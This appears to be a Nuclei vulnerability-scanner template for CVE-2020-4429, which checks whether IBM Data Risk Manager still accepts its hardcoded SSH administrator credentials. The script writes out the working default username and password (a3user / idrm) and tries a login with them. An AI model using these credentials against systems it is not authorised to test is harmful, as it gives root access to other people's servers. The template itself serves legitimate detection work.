id: CVE-2020-4429

info:
  name: IBM Data Risk Manager - Hardcoded Credentials
  author: Kazgangap
  severity: critical
  description: |
    IBM Data Risk Manager 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, and 2.0.6 contains a default password for an IDRM administrative account. A remote attacker could exploit this vulnerability to login and execute arbitrary code on the system with root privileges. IBM X-Force ID- 180534.
  impact: |
    Remote attackers can gain root access and execute arbitrary code, potentially leading to complete system compromise.
  remediation: |
    Change default passwords and update to the latest version if available.
  reference:
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/180534
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/ssh/ibm_drm_a3user.rb
    - https://www.ibm.com/support/pages/security-bulletin-vulnerabilities-exist-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-4429
    cwe-id: CWE-798
    epss-score: 0.90704
    epss-percentile: 0.99637
    cpe: cpe:2.3:a:ibm:data_risk_manager:2.0.1:*:*:*:*:*:*:*
  metadata:
    verified: false
    max-request: 1
    vendor: ibm
    product: data_risk_manager
  tags: js,cve,cve2020,ssh,ibm,default-login,vkev

javascript:
  - pre-condition: |
      var m = require("nuclei/ssh");
      var c = m.SSHClient();
      var response = c.ConnectSSHInfoMode(Host, Port);
      response["UserAuth"].includes("password")
    code: |
      var m = require("nuclei/ssh");
      var c = m.SSHClient();
      c.Connect(Host,Port,Username,Password);
    args:
      Host: "{{Host}}"
      Port: "22"
      Username: "a3user"
      Password: "idrm"

    matchers:
      - type: dsl
        dsl:
          - "response == true"
          - "success == true"
        condition: and
# digest: 4a0a00473045022100ba64cd50ea0195e33f908e8a000592014dba1f060f16b17ed993c65a6819c5b302204973dc1aa20f4f787d934dffd228abf5625d155a10fea510f905cc331929cffb:922c64590222798bb761d5b6d8e72950